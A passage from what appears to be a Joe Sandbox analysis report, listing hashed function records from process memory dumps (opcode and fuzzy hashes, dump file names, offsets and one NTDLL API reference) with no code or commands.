                                                                                                                                                                                                                                  • API String ID: 0-2010404446
                                                                                                                                                                                                                                  • Opcode ID: b82776fb69bf5ee4f449a741bd7d08cbd260c8917daaa2304854785412ed7b22
                                                                                                                                                                                                                                  • Instruction ID: ed82b626e258b52d5696a268da53f10ade8d3c6f3217eff39e62ee6efb929fdf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b82776fb69bf5ee4f449a741bd7d08cbd260c8917daaa2304854785412ed7b22
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CB14870E006098FDB10CFA9D89579EBBF2FF48714F258129D859EB294EB749846CB81
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • KiUserExceptionDispatcher.NTDLL ref: 05110A89
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3218817089.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_5110000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 6842923-0
                                                                                                                                                                                                                                  • Opcode ID: 9240dab70bc7a6b423641f9adbbf8574055f01996a53b9ad013c03ede9bc858b
                                                                                                                                                                                                                                  • Instruction ID: 80ddab30fe882e2a7472c8d6c20ff195411ac68c8626cd28d5a94f08d0cbbfba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9240dab70bc7a6b423641f9adbbf8574055f01996a53b9ad013c03ede9bc858b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8E0393AD01824DFCB25EB94F958AACB731FB88311F02C179D84623514C73068D2CBC9
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • KiUserExceptionDispatcher.NTDLL ref: 05110A89
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3218817089.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_5110000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 6842923-0
                                                                                                                                                                                                                                  • Opcode ID: 17571ac08a84f987aa599d162fbc0bb685d6e8d2a6267f049557498dcccdf92e
                                                                                                                                                                                                                                  • Instruction ID: 6074a6d3a7fc627582998bfc60c0bcde85eda9f316f13a3c8b176a3d7e7b3ba8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17571ac08a84f987aa599d162fbc0bb685d6e8d2a6267f049557498dcccdf92e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84E0B636E01924EBCB15DB84F9ACAACB371FB88312F01C179D89653554C73568D2CBC9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: K
                                                                                                                                                                                                                                  • API String ID: 0-2299363055
                                                                                                                                                                                                                                  • Opcode ID: fc1a9834c2fd863f395c85cb379955b6159d5524bac4694538f7a33d29ce9282
                                                                                                                                                                                                                                  • Instruction ID: f4842fb4729ac42e58dd10fd1bcd0e12f91c77f369cff67588a51ab2b31495a8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc1a9834c2fd863f395c85cb379955b6159d5524bac4694538f7a33d29ce9282
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B751F030A0460ACFCB15DFA8C5545AEBBF2FF95304B25462AC44AEB355DF30AC46CB41
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: K
                                                                                                                                                                                                                                  • API String ID: 0-2299363055
                                                                                                                                                                                                                                  • Opcode ID: 8bcb97d3bfabea8b536bde49bfe273175eda7c77c417307c7a3036660a1861a3
                                                                                                                                                                                                                                  • Instruction ID: e5fd72cb7d3043a5d66925ee9fcc95b09790411dc4372d042385b44efe636896
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8bcb97d3bfabea8b536bde49bfe273175eda7c77c417307c7a3036660a1861a3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A516D31A00609CFCB25DFA9C55059EBBF2FF89304B218629D419EB355EF70AD46CB81
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: (~|
                                                                                                                                                                                                                                  • API String ID: 0-554739493
                                                                                                                                                                                                                                  • Opcode ID: 2b52b681e5fca979895c812d479493fdff932a811ce0795e1c3e09896da673de
                                                                                                                                                                                                                                  • Instruction ID: 1768100b8efdacb203c021ed7fcc832bf3820c9c16bb49bfbd976bf282f8c816
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b52b681e5fca979895c812d479493fdff932a811ce0795e1c3e09896da673de
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E451DA38600605CFC78AEF28E554959BBA2FF85305710856CD402AF36DFB75E989CF84
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: K
                                                                                                                                                                                                                                  • API String ID: 0-2299363055
                                                                                                                                                                                                                                  • Opcode ID: 3e1831dfabbcb7eda99b39d6b4e370c8710ff3a2e6c531483f1f71913d63aea3
                                                                                                                                                                                                                                  • Instruction ID: 62393e1381d7b4a97cbe97020ef60550f219b4fb4ea661d356fd4473c60871ac
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e1831dfabbcb7eda99b39d6b4e370c8710ff3a2e6c531483f1f71913d63aea3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A416A31A04609CFCB25DFA8C5505AEBBF2FF88304B258629D419EB355EF30AD46CB41
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: dLdq
                                                                                                                                                                                                                                  • API String ID: 0-3390252261
                                                                                                                                                                                                                                  • Opcode ID: 4380a75220137ebc3e988fb862375462055d3a03af50d3dbb5c102ead7856d79
                                                                                                                                                                                                                                  • Instruction ID: 50291cd607d8bb49b32d95f3c025fb149b7f6baddd9e7649d0f1d80d031628ea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4380a75220137ebc3e988fb862375462055d3a03af50d3dbb5c102ead7856d79
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9419D75A042049FCB15DF68D488B99BBF2FF48304F1985A9E405EB3A2CB759D49CF90
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: LR^q
                                                                                                                                                                                                                                  • API String ID: 0-2625958711
                                                                                                                                                                                                                                  • Opcode ID: df73267648a631230de8981dc46054f19dd243199be771985a9450e0587a5f76
                                                                                                                                                                                                                                  • Instruction ID: 0e38decf7a52b47b8fb18ebcd31ea70edf94e8a6d403dfbdb6be566e79a316f1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df73267648a631230de8981dc46054f19dd243199be771985a9450e0587a5f76
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D131CF30F002168FCB45EBB9845466EBBF6FFC9310B154169D14ADB3A5EE309C428792
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: X|
                                                                                                                                                                                                                                  • API String ID: 0-1778972852
                                                                                                                                                                                                                                  • Opcode ID: 274c7f004fff9ec165d3d2660385950ce9a11d71cbe65d1635f79bf469c4d8e7
                                                                                                                                                                                                                                  • Instruction ID: c2a4594016a0687cf69d061ea8419c67d8d298ddba137575c35b7fbb535c455f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 274c7f004fff9ec165d3d2660385950ce9a11d71cbe65d1635f79bf469c4d8e7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A016D34A046098FC742EF78E545AA9BBF1FB45305B0145ADD80AEB658FB319C50DFC2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: |
                                                                                                                                                                                                                                  • API String ID: 0-2343686810
                                                                                                                                                                                                                                  • Opcode ID: d113ee5d8ba772743deec56f6fedc62b500997823ace2703e655e57f51e87e91
                                                                                                                                                                                                                                  • Instruction ID: faf6770cbf43b044998aeaae9c25882ea5b99c3f2d930711ac730e73780d9d58
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d113ee5d8ba772743deec56f6fedc62b500997823ace2703e655e57f51e87e91
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BE0683A7042914F8B0B22AC202147F3BD6EEC722032601ABE404DF751DDA89C028BF3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d10edd7f21ae9d1d0c60c16413e49fa23be73d6c43dfa4a0bed62af12af3dcd5
                                                                                                                                                                                                                                  • Instruction ID: dd6c27db3867d0d4f2af9b88937159d86b86144c5c145405913136aebde832f3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d10edd7f21ae9d1d0c60c16413e49fa23be73d6c43dfa4a0bed62af12af3dcd5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABB14970E002498FDF10CFA8D98679DBBF1FF88314F258129E815EB294EB749895CB95
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: eb86e13cac7e26b3884364ac8e77c3ddd63f637e4146e32a43bd45a81a477cd6
                                                                                                                                                                                                                                  • Instruction ID: 6ce5c1af5e3ce3346442ddf3ddebc6f52a519d038ccc6d011027b5249335d75c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb86e13cac7e26b3884364ac8e77c3ddd63f637e4146e32a43bd45a81a477cd6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66819C79B042099FDB09DB64D4A46AE7BB2EFD8200F15805AC805EB395DF389C43CF96
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f4684b27a53c4eaefc81d2151b73b6ae5578c054963c262f9904d4bf986d35fb
                                                                                                                                                                                                                                  • Instruction ID: 25c936eb6c6b5c20b905653c23b0826eca9577e67d3a7980e93fe3970e6664bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4684b27a53c4eaefc81d2151b73b6ae5578c054963c262f9904d4bf986d35fb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A617A71B00215AFDB14DF78C840A6ABBF2FF88314B258169D459EB395DB32EC42CB95
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5bd631f1670b1e552453d81a935d030915d356ec75a52ac06ed0349e67c47205
                                                                                                                                                                                                                                  • Instruction ID: b4dac515586cdc883782247acf83e80597b28635d7505e505225568d06a7afa3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5bd631f1670b1e552453d81a935d030915d356ec75a52ac06ed0349e67c47205
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2661FE34B0460ADBCB48EBB0E46896E7BB2FB853447208919D416DB3D4DF785C42DF85
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 047465ff089ed48a34acce28fa92e2491d88cef6330812921081ade99f06e97a
                                                                                                                                                                                                                                  • Instruction ID: f331f18ba7e674d92c210ba3d379e1e8914f9813cf196a72cff01f654ac7f8e9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 047465ff089ed48a34acce28fa92e2491d88cef6330812921081ade99f06e97a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B519C30700614DFCB06AB78D814B6E7FE7EF89700F158469E406EB3A9DE799C468B91
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8713eac3369c9fed7a66acf5f7658e0b25665e53d66b724cb7e074dfc8a0f028
                                                                                                                                                                                                                                  • Instruction ID: ecdf1d0d6e691f6969363e9f2fe3506fe26ac9d48a38c351a2d0ca238f640d8a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8713eac3369c9fed7a66acf5f7658e0b25665e53d66b724cb7e074dfc8a0f028
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5610034B0460ADBCB48EBB0E46896F77B2FB853447608919D41AEB398DF785C42DF85
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3a82e6720fd03ad65b132166a38694e071737fcdb49a41138dea78d2f7a344ef
                                                                                                                                                                                                                                  • Instruction ID: 87ffb09403b32afa2f1cc9a20b3054a7d1355609b7fdbf0e0f6908ee34e999a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a82e6720fd03ad65b132166a38694e071737fcdb49a41138dea78d2f7a344ef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8518C71B002059FCB05DF68D494AAEBBF2FF88314B108969E81AEB351DF359C46CB81
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3715530f00ae45ad01e3f0a8ce5da91453362720cae1fdc77409583286dcec1c
                                                                                                                                                                                                                                  • Instruction ID: b076a05a57741d16e14b2f0ff7015a4985d33684451b010011ff8423d9158777
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3715530f00ae45ad01e3f0a8ce5da91453362720cae1fdc77409583286dcec1c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5151FC34B0460ADBDB48EBB0E46892E77B2FBC53447208919D41AEB398CF785C42DF85
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 0ad6a8360359942426eb35a94ffa8cbbf625cefc8dbea448f599e5b1c7057ae0
                                                                                                                                                                                                                                  • Instruction ID: a08b98883a216e232d8e3b104f59db052099aae9c554795df6a811c9ffadd316
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ad6a8360359942426eb35a94ffa8cbbf625cefc8dbea448f599e5b1c7057ae0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF513A38B001099FCB45EF68D554AAEBBF2FF88314B258069D409EB358EF349D428B95
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c53adcff3221a2aab286270bfb5ceb01602cdefb8759e50321e0e6373e9edf36
                                                                                                                                                                                                                                  • Instruction ID: fe890b4368dd0250b08b7690965508c397f643aa43141c591c8ecb013ebb5d70
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c53adcff3221a2aab286270bfb5ceb01602cdefb8759e50321e0e6373e9edf36
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A851FB34B0460ADBCB48EBB0E46892E77B2FBC53447208919D41AEB398CE785C42DF85
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: cca7b130f8d9db8a68689306319a43eb47c52be77053307c2d0a55b77abdcfb9
                                                                                                                                                                                                                                  • Instruction ID: 900cde4ab1153a7253c5078f70b54606539b55c7f63471ba0bda5b6c20b79fdd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cca7b130f8d9db8a68689306319a43eb47c52be77053307c2d0a55b77abdcfb9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D519F30B00614DFCB05AB78D954B5E7AEBEF89700F108829E406FB7A8DE75DC468B95
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 55817639e5f2bff0b2412717ee102dd38ba40fec5f7636bdd02672a1f39a8688
                                                                                                                                                                                                                                  • Instruction ID: a9ee3c8e1af3e8fa99456c7767f02dd39ccf1ca50df59264daa21f78b6045a3a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55817639e5f2bff0b2412717ee102dd38ba40fec5f7636bdd02672a1f39a8688
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3417E35A00619CFCF04DFA8D99199DB7B2FF88300B118565D909AF346DB71ED06CB91
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9e48dfb5906f6af903fd728195837a3e1fbb7f51152f4d75d0929bb5a8c257b8
                                                                                                                                                                                                                                  • Instruction ID: 1883a8286ebc4bd5324bd626d17822ef90cb7a905988687f52fbe2fc64d5bd29
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e48dfb5906f6af903fd728195837a3e1fbb7f51152f4d75d0929bb5a8c257b8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C551EB34B1460ADBDB48EBB0E46896E77B2FBC53447208919D41AEB398CE785C42DB85
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 049af96029462235b358ce4bfe51892f4172e80652c5e425f8ece6ad8363b9bd
                                                                                                                                                                                                                                  • Instruction ID: 3bf13c0134310e19ff46ab130378ba2a296daa21f44aada0258b12a274d38101
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 049af96029462235b358ce4bfe51892f4172e80652c5e425f8ece6ad8363b9bd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1513E74B006059FCB04EB78D590AAEBBF2FF88304B118569E40AEB355EF75AD06CB51
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c75250540efc15414f006272267f59a9718ac49a030f388745ab3ea844997f9b
                                                                                                                                                                                                                                  • Instruction ID: 36fc11e411292eb7b7e725a8bf9e40715988cec466ac52c97854bb07608c9435
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c75250540efc15414f006272267f59a9718ac49a030f388745ab3ea844997f9b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C851EA34B1460ADBDB48EBB0F46896E77B2FBC53447208919D41AEB398CE785C43DB85
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 513221926925649e3e65c2d2e25ef95288dd4c71f669aa3ef8c903dfe4a87910
                                                                                                                                                                                                                                  • Instruction ID: cc92f4d4be6c5b004098545a18e982214305522a6106e54c0d1708cdd0dcb84a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 513221926925649e3e65c2d2e25ef95288dd4c71f669aa3ef8c903dfe4a87910
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14413B34B105198BCB44EB78D4A46AF77F2EFC8254B518529D409EB398DF389C438B9A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
